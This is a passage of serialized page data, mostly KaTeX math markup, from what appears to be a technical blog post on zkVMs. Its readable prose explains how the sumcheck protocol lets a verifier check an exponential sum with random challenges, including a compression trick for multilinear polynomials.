rops":109030,"children":109032},{"className":109031},[3705],[109033],{"type":28,"tag":116,"props":109034,"children":109036},{"className":109035,"style":92746},[3710],[109037],{"type":28,"tag":116,"props":109038,"children":109039},{},[],{"type":28,"tag":116,"props":109041,"children":109043},{"className":109042},[3791],[109044],{"type":33,"value":3794},{"type":28,"tag":116,"props":109046,"children":109048},{"className":109047,"style":3798},[3759],[],{"type":28,"tag":116,"props":109050,"children":109052},{"className":109051},[108750],[109053],{"type":33,"value":109054},"…",{"type":28,"tag":116,"props":109056,"children":109058},{"className":109057,"style":3798},[3759],[],{"type":28,"tag":116,"props":109060,"children":109062},{"className":109061},[3791],[109063],{"type":33,"value":3794},{"type":28,"tag":116,"props":109065,"children":109067},{"className":109066,"style":3798},[3759],[],{"type":28,"tag":116,"props":109069,"children":109071},{"className":109070},[3680],[109072,109077],{"type":28,"tag":116,"props":109073,"children":109075},{"className":109074},[3680,21251],[109076],{"type":33,"value":18939},{"type":28,"tag":116,"props":109078,"children":109080},{"className":109079},[3695],[109081],{"type":28,"tag":116,"props":109082,"children":109084},{"className":109083},[3700,21305],[109085,109115],{"type":28,"tag":116,"props":109086,"children":109088},{"className":109087},[3705],[109089,109110],{"type":28,"tag":116,"props":109090,"children":109093},{"className":109091,"style":109092},[3710],"height:0.1514em;",[109094],{"type":28,"tag":116,"props":109095,"children":109096},{"style":92719},[109097,109101],{"type":28,"tag":116,"props":109098,"children":109100},{"className":109099,"style":3720},[3719],[],{"type":28,"tag":116,"props":109102,"children":109104},{"className":109103},[3725,3726,3727,3728],[109105],{"type":28,"tag":116,"props":109106,"children":109108},{"className":109107},[3680,21251,3728],[109109],{"type":33,"value":56022},{"type":28,"tag":116,"props":109111,"children":109113},{"className":109112},[21407],[109114],{"type":33,"value":21410},{"type":28,"tag":116,"props":109116,"children":109118},{"className":109117},[3705],[109119],{"type":28,"tag":116,"props":109120,"children":109122},{"className":109121,"style":92746},[3710],[109123],{"type":28,"tag":116,"props":109124,"children":109125},{},[],{"type":28,"tag":116,"props":109127,"children":109129},{"className":109128},[21401],[109130],{"type":33,"value":1829},{"type":28,"tag":29,"props":109132,"children":109133},{},[109134,109136,109197],{"type":33,"value":109135},"The naive approach would be for the verifier to compute all ",{"type":28,"tag":98,"props":109137,"children":109139},{"className":109138},[3652,3653],[109140],{"type":28,"tag":116,"props":109141,"children":109143},{"className":109142},[3658],[109144],{"type":28,"tag":116,"props":109145,"children":109147},{"className":109146,"ariaHidden":3664},[3663],[109148],{"type":28,"tag":116,"props":109149,"children":109151},{"className":109150},[3669],[109152,109156],{"type":28,"tag":116,"props":109153,"children":109155},{"className":109154,"style":108377},[3674],[],{"type":28,"tag":116,"props":109157,"children":109159},{"className":109158},[3680],[109160,109165],{"type":28,"tag":116,"props":109161,"children":109163},{"className":109162},[3680],[109164],{"type":33,"value":2794},{"type":28,"tag":116,"props":109166,"children":109168},{"className":109167},[3695],[109169],{"type":28,"tag":116,"props":109170,"children":109172},{"className":109171},[3700],[109173],{"type":28,"tag":116,"props":109174,"children":109176},{"className":109175},[3705],[109177],{"type":28,"tag":116,"props":109178,"children":109180},{"className":109179,"style":108377},[3710],[109181],{"type":28,"tag":116,"props":109182,"children":109183},{"style":3714},[109184,109188],{"type":28,"tag":116,"props":109185,"children":109187},{"className":109186,"style":3720},[3719],[],{"type":28,"tag":116,"props":109189,"children":109191},{"className":109190},[3725,3726,3727,3728],[109192],{"type":28,"tag":116,"props":109193,"children":109195},{"className":109194},[3680,21251,3728],[109196],{"type":33,"value":56022},{"type":33,"value":109198}," evaluations. This is exponentially expensive.",{"type":28,"tag":29,"props":109200,"children":109201},{},[109202,109204,109209],{"type":33,"value":109203},"The sumcheck protocol is a clever interactive protocol that reduces the exponential number of polynomial evaluations to checking ",{"type":28,"tag":4995,"props":109205,"children":109206},{},[109207],{"type":33,"value":109208},"only one",{"type":33,"value":141},{"type":28,"tag":29,"props":109211,"children":109212},{},[109213],{"type":28,"tag":206,"props":109214,"children":109217},{"alt":109215,"src":109216},"sumcheck_v2","/posts/zkvms-unfaithful-claims/sumcheck_v2.svg",[],{"type":28,"tag":29,"props":109219,"children":109220},{},[109221,109223,109315,109317,109502,109504,109529,109531,109609,109611,109690],{"type":33,"value":109222},"In each round, the prover must send a polynomial ",{"type":28,"tag":98,"props":109224,"children":109226},{"className":109225},[3652,3653],[109227],{"type":28,"tag":116,"props":109228,"children":109230},{"className":109229},[3658],[109231],{"type":28,"tag":116,"props":109232,"children":109234},{"className":109233,"ariaHidden":3664},[3663],[109235],{"type":28,"tag":116,"props":109236,"children":109238},{"className":109237},[3669],[109239,109243,109300,109305,109310],{"type":28,"tag":116,"props":109240,"children":109242},{"className":109241,"style":3780},[3674],[],{"type":28,"tag":116,"props":109244,"children":109246},{"className":109245},[3680],[109247,109252],{"type":28,"tag":116,"props":109248,"children":109250},{"className":109249,"style":93149},[3680,21251],[109251],{"type":33,"value":108911},{"type":28,"tag":116,"props":109253,"children":109255},{"className":109254},[3695],[109256],{"type":28,"tag":116,"props":109257,"children":109259},{"className":109258},[3700,21305],[109260,109289],{"type":28,"tag":116,"props":109261,"children":109263},{"className":109262},[3705],[109264,109284],{"type":28,"tag":116,"props":109265,"children":109267},{"className":109266,"style":93192},[3710],[109268],{"type":28,"tag":116,"props":109269,"children":109270},{"style":93196},[109271,109275],{"type":28,"tag":116,"props":109272,"children":109274},{"className":109273,"style":3720},[3719],[],{"type":28,"tag":116,"props":109276,"children":109278},{"className":109277},[3725,3726,3727,3728],[109279],{"type":28,"tag":116,"props":109280,"children":109282},{"className":109281},[3680,21251,3728],[109283],{"type":33,"value":3408},{"type":28,"tag":116,"props":109285,"children":109287},{"className":109286},[21407],[109288],{"type":33,"value":21410},{"type":28,"tag":116,"props":109290,"children":109292},{"className":109291},[3705],[109293],{"type":28,"tag":116,"props":109294,"children":109296},{"className":109295,"style":92746},[3710],[109297],{"type":28,"tag":116,"props":109298,"children":109299},{},[],{"type":28,"tag":116,"props":109301,"children":109303},{"className":109302},[21380],[109304],{"type":33,"value":313},{"type":28,"tag":116,"props":109306,"children":109308},{"className":109307,"style":94683},[3680,21251],[109309],{"type":33,"value":5804},{"type":28,"tag":116,"props":109311,"children":109313},{"className":109312},[21401],[109314],{"type":33,"value":1829},{"type":33,"value":109316}," such that ",{"type":28,"tag":98,"props":109318,"children":109320},{"className":109319},[3652,3653],[109321],{"type":28,"tag":116,"props":109322,"children":109324},{"className":109323},[3658],[109325],{"type":28,"tag":116,"props":109326,"children":109328},{"className":109327,"ariaHidden":3664},[3663],[109329,109422],{"type":28,"tag":116,"props":109330,"children":109332},{"className":109331},[3669],[109333,109337,109394,109399,109404,109409,109413,109418],{"type":28,"tag":116,"props":109334,"children":109336},{"className":109335,"style":3780},[3674],[],{"type":28,"tag":116,"props":109338,"children":109340},{"className":109339},[3680],[109341,109346],{"type":28,"tag":116,"props":109342,"children":109344},{"className":109343,"style":93149},[3680,21251],[109345],{"type":33,"value":108911},{"type":28,"tag":116,"props":109347,"children":109349},{"className":109348},[3695],[109350],{"type":28,"tag":116,"props":109351,"children":109353},{"className":109352},[3700,21305],[109354,109383],{"type":28,"tag":116,"props":109355,"children":109357},{"className":109356},[3705],[109358,109378],{"type":28,"tag":116,"props":109359,"children":109361},{"className":109360,"style":93192},[3710],[109362],{"type":28,"tag":116,"props":109363,"children":109364},{"style":93196},[109365,109369],{"type":28,"tag":116,"props":109366,"children":109368},{"className":109367,"style":3720},[3719],[],{"type":28,"tag":116,"props":109370,"children":109372},{"className":109371},[3725,3726,3727,3728],[109373],{"type":28,"tag":116,"props":109374,"children":109376},{"className":109375},[3680,21251,3728],[109377],{"type":33,"value":3408},{"type":28,"tag":116,"props":109379,"children":109381},{"className":109380},[21407],[109382],{"type":33,"value":21410},{"type":28,"tag":116,"props":109384,"children":109386},{"className":109385},[3705],[109387],{"type":28,"tag":116,"props":109388,"children":109390},{"className":109389,"style":92746},[3710],[109391],{"type":28,"tag":116,"props":109392,"children":109393},{},[],{"type":28,"tag":116,"props":109395,"children":109397},{"className":109396},[21380],[109398],{"type":33,"value":313},{"type":28,"tag":116,"props":109400,"children":109402},{"className":109401},[3680],[109403],{"type":33,"value":353},{"type":28,"tag":116,"props":109405,"children":109407},{"className":109406},[21401],[109408],{"type":33,"value":1829},{"type":28,"tag":116,"props":109410,"children":109412},{"className":109411,"style":3760},[3759],[],{"type":28,"tag":116,"props":109414,"children":109416},{"className":109415},[3765],[109417],{"type":33,"value":2268},{"type":28,"tag":116,"props":109419,"children":109421},{"className":109420,"style":3760},[3759],[],{"type":28,"tag":116,"props":109423,"children":109425},{"className":109424},[3669],[109426,109430,109487,109492,109497],{"type":28,"tag":116,"props":109427,"children":109429},{"className":109428,"style":3780},[3674],[],{"type":28,"tag":116,"props":109431,"children":109433},{"className":109432},[3680],[109434,109439],{"type":28,"tag":116,"props":109435,"children":109437},{"className":109436,"style":93149},[3680,21251],[109438],{"type":33,"value":108911},{"type":28,"tag":116,"props":109440,"children":109442},{"className":109441},[3695],[109443],{"type":28,"tag":116,"props":109444,"children":109446},{"className":109445},[3700,21305],[109447,109476],{"type":28,"tag":116,"props":109448,"children":109450},{"className":109449},[3705],[109451,109471],{"type":28,"tag":116,"props":109452,"children":109454},{"className":109453,"style":93192},[3710],[109455],{"type":28,"tag":116,"props":109456,"children":109457},{"style":93196},[109458,109462],{"type":28,"tag":116,"props":109459,"children":109461},{"className":109460,"style":3720},[3719],[],{"type":28,"tag":116,"props":109463,"children":109465},{"className":109464},[3725,3726,3727,3728],[109466],{"type":28,"tag":116,"props":109467,"children":109469},{"className":109468},[3680,21251,3728],[109470],{"type":33,"value":3408},{"type":28,"tag":116,"props":109472,"children":109474},{"className":109473},[21407],[109475],{"type":33,"value":21410},{"type":28,"tag":116,"props":109477,"children":109479},{"className":109478},[3705],[109480],{"type":28,"tag":116,"props":109481,"children":109483},{"className":109482,"style":92746},[3710],[109484],{"type":28,"tag":116,"props":109485,"children":109486},{},[],{"type":28,"tag":116,"props":109488,"children":109490},{"className":109489},[21380],[109491],{"type":33,"value":313},{"type":28,"tag":116,"props":109493,"children":109495},{"className":109494},[3680],[109496],{"type":33,"value":1824},{"type":28,"tag":116,"props":109498,"children":109500},{"className":109499},[21401],[109501],{"type":33,"value":1829},{"type":33,"value":109503}," equals the previous claim. If the prover is lying about the original sum ",{"type":28,"tag":98,"props":109505,"children":109507},{"className":109506},[3652,3653],[109508],{"type":28,"tag":116,"props":109509,"children":109511},{"className":109510},[3658],[109512],{"type":28,"tag":116,"props":109513,"children":109515},{"className":109514,"ariaHidden":3664},[3663],[109516],{"type":28,"tag":116,"props":109517,"children":109519},{"className":109518},[3669],[109520,109524],{"type":28,"tag":116,"props":109521,"children":109523},{"className":109522,"style":21246},[3674],[],{"type":28,"tag":116,"props":109525,"children":109527},{"className":109526,"style":92897},[3680,21251],[109528],{"type":33,"value":92900},{"type":33,"value":109530},", then they must lie about ",{"type":28,"tag":98,"props":109532,"children":109534},{"className":109533},[3652,3653],[109535],{"type":28,"tag":116,"props":109536,"children":109538},{"className":109537},[3658],[109539],{"type":28,"tag":116,"props":109540,"children":109542},{"className":109541,"ariaHidden":3664},[3663],[109543],{"type":28,"tag":116,"props":109544,"children":109546},{"className":109545},[3669],[109547,109552],{"type":28,"tag":116,"props":109548,"children":109551},{"className":109549,"style":109550},[3674],"height:0.625em;vertical-align:-0.1944em;",[],{"type":28,"tag":116,"props":109553,"children":109555},{"className":109554},[3680],[109556,109561],{"type":28,"tag":116,"props":109557,"children":109559},{"className":109558,"style":93149},[3680,21251],[109560],{"type":33,"value":108911},{"type":28,"tag":116,"props":109562,"children":109564},{"className":109563},[3695],[109565],{"type":28,"tag":116,"props":109566,"children":109568},{"className":109567},[3700,21305],[109569,109598],{"type":28,"tag":116,"props":109570,"children":109572},{"className":109571},[3705],[109573,109593],{"type":28,"tag":116,"props":109574,"children":109576},{"className":109575,"style":93192},[3710],[109577],{"type":28,"tag":116,"props":109578,"children":109579},{"style":93196},[109580,109584],{"type":28,"tag":116,"props":109581,"children":109583},{"className":109582,"style":3720},[3719],[],{"type":28,"tag":116,"props":109585,"children":109587},{"className":109586},[3725,3726,3727,3728],[109588],{"type":28,"tag":116,"props":109589,"children":109591},{"className":109590},[3680,21251,3728],[109592],{"type":33,"value":3408},{"type":28,"tag":116,"props":109594,"children":109596},{"className":109595},[21407],[109597],{"type":33,"value":21410},{"type":28,"tag":116,"props":109599,"children":109601},{"className":109600},[3705],[109602],{"type":28,"tag":116,"props":109603,"children":109605},{"className":109604,"style":92746},[3710],[109606],{"type":28,"tag":116,"props":109607,"children":109608},{},[],{"type":33,"value":109610}," somewhere. But since the verifier picks a random ",{"type":28,"tag":98,"props":109612,"children":109614},{"className":109613},[3652,3653],[109615],{"type":28,"tag":116,"props":109616,"children":109618},{"className":109617},[3658],[109619],{"type":28,"tag":116,"props":109620,"children":109622},{"className":109621,"ariaHidden":3664},[3663],[109623],{"type":28,"tag":116,"props":109624,"children":109626},{"className":109625},[3669],[109627,109632],{"type":28,"tag":116,"props":109628,"children":109631},{"className":109629,"style":109630},[3674],"height:0.5806em;vertical-align:-0.15em;",[],{"type":28,"tag":116,"props":109633,"children":109635},{"className":109634},[3680],[109636,109641],{"type":28,"tag":116,"props":109637,"children":109639},{"className":109638,"style":92663},[3680,21251],[109640],{"type":33,"value":93482},{"type":28,"tag":116,"props":109642,"children":109644},{"className":109643},[3695],[109645],{"type":28,"tag":116,"props":109646,"children":109648},{"className":109647},[3700,21305],[109649,109679],{"type":28,"tag":116,"props":109650,"children":109652},{"className":109651},[3705],[109653,109674],{"type":28,"tag":116,"props":109654,"children":109656},{"className":109655,"style":93192},[3710],[109657],{"type":28,"tag":116,"props":109658,"children":109660},{"style":109659},"top:-2.55em;margin-left:-0.0278em;margin-right:0.05em;",[109661,109665],{"type":28,"tag":116,"props":109662,"children":109664},{"className":109663,"style":3720},[3719],[],{"type":28,"tag":116,"props":109666,"children":109668},{"className":109667},[3725,3726,3727,3728],[109669],{"type":28,"tag":116,"props":109670,"children":109672},{"className":109671},[3680,21251,3728],[109673],{"type":33,"value":3408},{"type":28,"tag":116,"props":109675,"children":109677},{"className":109676},[21407],[109678],{"type":33,"value":21410},{"type":28,"tag":116,"props":109680,"children":109682},{"className":109681},[3705],[109683],{"type":28,"tag":116,"props":109684,"children":109686},{"className":109685,"style":92746},[3710],[109687],{"type":28,"tag":116,"props":109688,"children":109689},{},[],{"type":33,"value":109691},", with overwhelming probability, the prover won't then be able to match the evaluation of the original polynomial.",{"type":28,"tag":443,"props":109693,"children":109695},{"id":109694},"the-compression-trick",[109696],{"type":33,"value":109697},"The Compression Trick",{"type":28,"tag":29,"props":109699,"children":109700},{},[109701,109703,109853,109855,110135],{"type":33,"value":109702},"For degree-1 (multilinear) polynomials, ",{"type":28,"tag":98,"props":109704,"children":109706},{"className":109705},[3652,3653],[109707],{"type":28,"tag":116,"props":109708,"children":109710},{"className":109709},[3658],[109711],{"type":28,"tag":116,"props":109712,"children":109714},{"className":109713,"ariaHidden":3664},[3663],[109715,109808,109835],{"type":28,"tag":116,"props":109716,"children":109718},{"className":109717},[3669],[109719,109723,109780,109785,109790,109795,109799,109804],{"type":28,"tag":116,"props":109720,"children":109722},{"className":109721,"style":3780},[3674],[],{"type":28,"tag":116,"props":109724,"children":109726},{"className":109725},[3680],[109727,109732],{"type":28,"tag":116,"props":109728,"children":109730},{"className":109729,"style":93149},[3680,21251],[109731],{"type":33,"value":108911},{"type":28,"tag":116,"props":109733,"children":109735},{"className":109734},[3695],[109736],{"type":28,"tag":116,"props":109737,"children":109739},{"className":109738},[3700,21305],[109740,109769],{"type":28,"tag":116,"props":109741,"children":109743},{"className":109742},[3705],[109744,109764],{"type":28,"tag":116,"props":109745,"children":109747},{"className":109746,"style":93192},[3710],[109748],{"type":28,"tag":116,"props":109749,"children":109750},{"style":93196},[109751,109755],{"type":28,"tag":116,"props":109752,"children":109754},{"className":109753,"style":3720},[3719],[],{"type":28,"tag":116,"props":109756,"children":109758},{"className":109757},[3725,3726,3727,3728],[109759],{"type":28,"tag":116,"props":109760,"children":109762},{"className":109761},[3680,21251,3728],[109763],{"type":33,"value":3408},{"type":28,"tag":116,"props":109765,"children":109767},{"className":109766},[21407],[109768],{"type":33,"value":21410},{"type":28,"tag":116,"props":109770,"children":109772},{"className":109771},[3705],[109773],{"type":28,"tag":116,"props":109774,"children":109776},{"className":109775,"style":92746},[3710],[109777],{"type":28,"tag":116,"props":109778,"children":109779},{},[],{"type":28,"tag":116,"props":109781,"children":109783},{"className":109782},[21380],[109784],{"type":33,"value":313},{"type":28,"tag":116,"props":109786,"children":109788},{"className":109787,"style":94683},[3680,21251],[109789],{"type":33,"value":5804},{"type":28,"tag":116,"props":109791,"children":109793},{"className":109792},[21401],[109794],{"type":33,"value":1829},{"type":28,"tag":116,"props":109796,"children":109798},{"className":109797,"style":3857},[3759],[],{"type":28,"tag":116,"props":109800,"children":109802},{"className":109801},[3862],[109803],{"type":33,"value":373},{"type":28,"tag":116,"props":109805,"children":109807},{"className":109806,"style":3857},[3759],[],{"type":28,"tag":116,"props":109809,"children":109811},{"className":109810},[3669],[109812,109817,109822,109826,109831],{"type":28,"tag":116,"props":109813,"children":109816},{"className":109814,"style":109815},[3674],"height:0.6667em;vertical-align:-0.0833em;",[],{"type":28,"tag":116,"props":109818,"children":109820},{"className":109819},[3680,21251],[109821],{"type":33,"value":87},{"type":28,"tag":116,"props":109823,"children":109825},{"className":109824,"style":3760},[3759],[],{"type":28,"tag":116,"props":109827,"children":109829},{"className":109828},[3765],[109830],{"type":33,"value":2268},{"type":28,"tag":116,"props":109832,"children":109834},{"className":109833,"style":3760},[3759],[],{"type":28,"tag":116,"props":109836,"children":109838},{"className":109837},[3669],[109839,109843,109848],{"type":28,"tag":116,"props":109840,"children":109842},{"className":109841,"style":92578},[3674],[],{"type":28,"tag":116,"props":109844,"children":109846},{"className":109845},[3680,21251],[109847],{"type":33,"value":2893},{"type":28,"tag":116,"props":109849,"children":109851},{"className":109850,"style":94683},[3680,21251],[109852],{"type":33,"value":5804},{"type":33,"value":109854}," has only two coefficients. Since the verifier knows ",{"type":28,"tag":98,"props":109856,"children":109858},{"className":109857},[3652,3653],[109859],{"type":28,"tag":116,"props":109860,"children":109862},{"className":109861},[3658],[109863],{"type":28,"tag":116,"props":109864,"children":109866},{"className":109865,"ariaHidden":3664},[3663],[109867,109960,110053],{"type":28,"tag":116,"props":109868,"children":109870},{"className":109869},[3669],[109871,109875,109932,109937,109942,109947,109951,109956],{"type":28,"tag":116,"props":109872,"children":109874},{"className":109873,"style":3780},[3674],[],{"type":28,"tag":116,"props":109876,"children":109878},{"className":109877},[3680],[109879,109884],{"type":28,"tag":116,"props":109880,"children":109882},{"className":109881,"style":93149},[3680,21251],[109883],{"type":33,"value":108911},{"type":28,"tag":116,"props":109885,"children":109887},{"className":109886},[3695],[109888],{"type":28,"tag":116,"props":109889,"children":109891},{"className":109890},[3700,21305],[109892,109921],{"type":28,"tag":116,"props":109893,"children":109895},{"className":109894},[3705],[109896,109916],{"type":28,"tag":116,"props":109897,"children":109899},{"className":109898,"style":93192},[3710],[109900],{"type":28,"tag":116,"props":109901,"children":109902},{"style":93196},[109903,109907],{"type":28,"tag":116,"props":109904,"children":109906},{"className":109905,"style":3720},[3719],[],{"type":28,"tag":116,"props":109908,"children":109910},{"className":109909},[3725,3726,3727,3728],[109911],{"type":28,"tag":116,"props":109912,"children":109914},{"className":109913},[3680,21251,3728],[109915],{"type":33,"value":3408},{"type":28,"tag":116,"props":109917,"children":109919},{"className":109918},[21407],[109920],{"type":33,"value":21410},{"type":28,"tag":116,"props":109922,"children":109924},{"className":109923},[3705],[109925],{"type":28,"tag":116,"props":109926,"children":109928},{"className":109927,"style":92746},[3710],[109929],{"type":28,"tag":116,"props":109930,"children":109931},{},[],{"type":28,"tag":116,"props":109933,"children":109935},{"className":109934},[21380],[109936],{"type":33,"value":313},{"type":28,"tag":116,"props":109938,"children":109940},{"className":109939},[3680],[109941],{"type":33,"value":353},{"type":28,"tag":116,"props":109943,"children":109945},{"className":109944},[21401],[109946],{"type":33,"value":1829},{"type":28,"tag":116,"props":109948,"children":109950},{"className":109949,"style":3760},[3759],[],{"type":28,"tag":116,"props":109952,"children":109954},{"className":109953},[3765],[109955],{"type":33,"value":2268},{"type":28,"tag":116,"props":109957,"children":109959},{"className":109958,"style":3760},[3759],[],{"type":28,"tag":116,"props":109961,"children":109963},{"className":109962},[3669],[109964,109968,110025,110030,110035,110040,110044,110049],{"type":28,"tag":116,"props":109965,"children":109967},{"className":109966,"style":3780},[3674],[],{"type":28,"tag":116,"props":109969,"children":109971},{"className":109970},[3680],[109972,109977],{"type":28,"tag":116,"props":109973,"children":109975},{"className":109974,"style":93149},[3680,21251],[109976],{"type":33,"value":108911},{"type":28,"tag":116,"props":109978,"children":109980},{"className":109979},[3695],[109981],{"type":28,"tag":116,"props":109982,"children":109984},{"className":109983},[3700,21305],[109985,110014],{"type":28,"tag":116,"props":109986,"children":109988},{"className":109987},[3705],[109989,110009],{"type":28,"tag":116,"props":109990,"children":109992},{"className":109991,"style":93192},[3710],[109993],{"type":28,"tag":116,"props":109994,"children":109995},{"style":93196},[109996,110000],{"type":28,"tag":116,"props":109997,"children":109999},{"className":109998,"style":3720},[3719],[],{"type":28,"tag":116,"props":110001,"children":110003},{"className":110002},[3725,3726,3727,3728],[110004],{"type":28,"tag":116,"props":110005,"children":110007},{"className":110006},[3680,21251,3728],[110008],{"type":33,"value":3408},{"type":28,"tag":116,"props":110010,"children":110012},{"className":110011},[21407],[110013],{"type":33,"value":21410},{"type":28,"tag":116,"props":110015,"children":110017},{"className":110016},[3705],[110018],{"type":28,"tag":116,"props":110019,"children":110021},{"className":110020,"style":92746},[3710],[110022],{"type":28,"tag":116,"props":110023,"children":110024},{},[],{"type":28,"tag":116,"props":110026,"children":110028},{"className":110027},[21380],[110029],{"type":33,"value":313},{"type":28,"tag":116,"props":110031,"children":110033},{"className":110032},[3680],[110034],{"type":33,"value":1824},{"type":28,"tag":116,"props":110036,"children":110038},{"className":110037},[21401],[110039],{"type":33,"value":1829},{"type":28,"tag":116,"props":110041,"children":110043},{"className":110042,"style":3857},[3759],[],{"type":28,"tag":116,"props":110045,"children":110047},{"className":110046},[3862],[110048],{"type":33,"value":373},{"type":28,"tag":116,"props":110050,"children":110052},{"className":110051,"style":3857},[3759],[],{"type":28,"tag":116,"props":110054,"children":110056},{"className":110055},[3669],[110057,110062],{"type":28,"tag":116,"props":110058,"children":110061},{"className":110059,"style":110060},[3674],"height:0.8917em;vertical-align:-0.2083em;",[],{"type":28,"tag":116,"props":110063,"children":110065},{"className":110064},[3680],[110066,110071],{"type":28,"tag":116,"props":110067,"children":110069},{"className":110068,"style":92897},[3680,21251],[110070],{"type":33,"value":92900},{"type":28,"tag":116,"props":110072,"children":110074},{"className":110073},[3695],[110075],{"type":28,"tag":116,"props":110076,"children":110078},{"className":110077},[3700,21305],[110079,110123],{"type":28,"tag":116,"props":110080,"children":110082},{"className":110081},[3705],[110083,110118],{"type":28,"tag":116,"props":110084,"children":110086},{"className":110085,"style":93192},[3710],[110087],{"type":28,"tag":116,"props":110088,"children":110090},{"style":110089},"top:-2.55em;margin-left:-0.0813em;margin-right:0.05em;",[110091,110095],{"type":28,"tag":116,"props":110092,"children":110094},{"className":110093,"style":3720},[3719],[],{"type":28,"tag":116,"props":110096,"children":110098},{"className":110097},[3725,3726,3727,3728],[110099],{"type":28,"tag":116,"props":110100,"children":110102},{"className":110101},[3680,3728],[110103,110108,110113],{"type":28,"tag":116,"props":110104,"children":110106},{"className":110105},[3680,21251,3728],[110107],{"type":33,"value":3408},{"type":28,"tag":116,"props":110109,"children":110111},{"className":110110},[3765,3728],[110112],{"type":33,"value":3739},{"type":28,"tag":116,"props":110114,"children":110116},{"className":110115},[3680,3728],[110117],{"type":33,"value":1824},{"type":28,"tag":116,"props":110119,"children":110121},{"className":110120},[21407],[110122],{"type":33,"value":21410},{"type":28,"tag":116,"props":110124,"children":110126},{"className":110125},[3705],[110127],{"type":28,"tag":116,"props":110128,"children":110131},{"className":110129,"style":110130},[3710],"height:0.2083em;",[110132],{"type":28,"tag":116,"props":110133,"children":110134},{},[],{"type":33,"value":110136}," (the previous claim), we have:",{"type":28,"tag":29,"props":110138,"children":110139},{},[110140],{"type":28,"tag":98,"props":110141,"children":110143},{"className":110142},[3652,3653],[110144],{"type":28,"tag":116,"props":110145,"children":110147},{"className":110146},[3658],[110148],{"type":28,"tag":116,"props":110149,"children":110151},{"className":110150,"ariaHidden":3664},[3663],[110152,110178,110209,110240,110341,110367,110459],{"type":28,"tag":116,"props":110153,"children":110155},{"className":110154},[3669],[110156,110160,110165,110169,110174],{"type":28,"tag":116,"props":110157,"children":110159},{"className":110158,"style":109815},[3674],[],{"type":28,"tag":116,"props":110161,"children":110163},{"className":110162},[3680,21251],[110164],{"type":33,"value":87},{"type":28,"tag":116,"props":110166,"children":110168},{"className":110167,"style":3760},[3759],[],{"type":28,"tag":116,"props":110170,"children":110172},{"className":110171},[3765],[110173],{"type":33,"value":2268},{"type":28,"tag":116,"props":110175,"children":110177},{"className":110176,"style":3760},[3759],[],{"type":28,"tag":116,"props":110179,"children":110181},{"className":110180},[3669],[110182,110186,110191,110196,110200,110205],{"type":28,"tag":116,"props":110183,"children":110185},{"className":110184,"style":3780},[3674],[],{"type":28,"tag":116,"props":110187,"children":110189},{"className":110188},[21380],[110190],{"type":33,"value":313},{"type":28,"tag":116,"props":110192,"children":110194},{"className":110193},[3680,21251],[110195],{"type":33,"value":87},{"type":28,"tag":116,"props":110197,"children":110199},{"className":110198,"style":3760},[3759],[],{"type":28,"tag":116,"props":110201,"children":110203},{"className":110202},[3765],[110204],{"type":33,"value":2268},{"type":28,"tag":116,"props":110206,"children":110208},{"className":110207,"style":3760},[3759],[],{"type":28,"tag":116,"props":110210,"children":110212},{"className":110211},[3669],[110213,110217,110222,110227,110231,110236],{"type":28,"tag":116,"props":110214,"children":110216},{"className":110215,"style":3780},[3674],[],{"type":28,"tag":116,"props":110218,"children":110220},{"className":110219},[3680,21251],[110221],{"type":33,"value":2893},{"type":28,"tag":116,"props":110223,"children":110225},{"className":110224},[21401],[110226],{"type":33,"value":1829},{"type":28,"tag":116,"props":110228,"children":110230},{"className":110229,"style":3857},[3759],[],{"type":28,"tag":116,"props":110232,"children":110234},{"className":110233},[3862],[110235],{"type":33,"value":373},{"type":28,"tag":116,"props":110237,"children":110239},{"className":110238,"style":3857},[3759],[],{"type":28,"tag":116,"props":110241,"children":110243},{"className":110242},[3669],[110244,110248,110319,110323,110327,110333,110337],{"type":28,"tag":116,"props":110245,"children":110247},{"className":110246,"style":110060},[3674],[],{"type":28,"tag":116,"props":110249,"children":110251},{"className":110250},[3680],[110252,110257],{"type":28,"tag":116,"props":110253,"children":110255},{"className":110254,"style":92897},[3680,21251],[110256],{"type":33,"value":92900},{"type":28,"tag":116,"props":110258,"children":110260},{"className":110259},[3695],[110261],{"type":28,"tag":116,"props":110262,"children":110264},{"className":110263},[3700,21305],[110265,110308],{"type":28,"tag":116,"props":110266,"children":110268},{"className":110267},[3705],[110269,110303],{"type":28,"tag":116,"props":110270,"children":110272},{"className":110271,"style":93192},[3710],[110273],{"type":28,"tag":116,"props":110274,"children":110275},{"style":110089},[110276,110280],{"type":28,"tag":116,"props":110277,"children":110279},{"className":110278,"style":3720},[3719],[],{"type":28,"tag":116,"props":110281,"children":110283},{"className":110282},[3725,3726,3727,3728],[110284],{"type":28,"tag":116,"props":110285,"children":110287},{"className":110286},[3680,3728],[110288,110293,110298],{"type":28,"tag":116,"props":110289,"children":110291},{"className":110290},[3680,21251,3728],[110292],{"type":33,"value":3408},{"type":28,"tag":116,"props":110294,"children":110296},{"className":110295},[3765,3728],[110297],{"type":33,"value":3739},{"type":28,"tag":116,"props":110299,"children":110301},{"className":110300},[3680,3728],[110302],{"type":33,"value":1824},{"type":28,"tag":116,"props":110304,"children":110306},{"className":110305},[21407],[110307],{"type":33,"value":21410},{"type":28,"tag":116,"props":110309,"children":110311},{"className":110310},[3705],[110312],{"type":28,"tag":116,"props":110313,"children":110315},{"className":110314,"style":110130},[3710],[110316],{"type":28,"tag":116,"props":110317,"children":110318},{},[],{"type":28,"tag":116,"props":110320,"children":110322},{"className":110321,"style":3857},[3759],[],{"type":28,"tag":116,"props":110324,"children":110326},{"className":110325,"style":3857},[3759],[],{"type":28,"tag":116,"props":110328,"children":110330},{"className":110329},[3862],[110331],{"type":33,"value":110332},"⟹",{"type":28,"tag":116,"props":110334,"children":110336},{"className":110335,"style":3857},[3759],[],{"type":28,"tag":116,"props":110338,"children":110340},{"className":110339,"style":3857},[3759],[],{"type":28,"tag":116,"props":110342,"children":110344},{"className":110343},[3669],[110345,110349,110354,110358,110363],{"type":28,"tag":116,"props":110346,"children":110348},{"className":110347,"style":92578},[3674],[],{"type":28,"tag":116,"props":110350,"children":110352},{"className":110351},[3680,21251],[110353],{"type":33,"value":2893},{"type":28,"tag":116,"props":110355,"children":110357},{"className":110356,"style":3857},[3759],[],{"type":28,"tag":116,"props":110359,"children":110361},{"className":110360},[3862],[110362],{"type":33,"value":373},{"type":28,"tag":116,"props":110364,"children":110366},{"className":110365,"style":3857},[3759],[],{"type":28,"tag":116,"props":110368,"children":110370},{"className":110369},[3669],[110371,110375,110446,110450,110455],{"type":28,"tag":116,"props":110372,"children":110374},{"className":110373,"style":110060},[3674],[],{"type":28,"tag":116,"props":110376,"children":110378},{"className":110377},[3680],[110379,110384],{"type":28,"tag":116,"props":110380,"c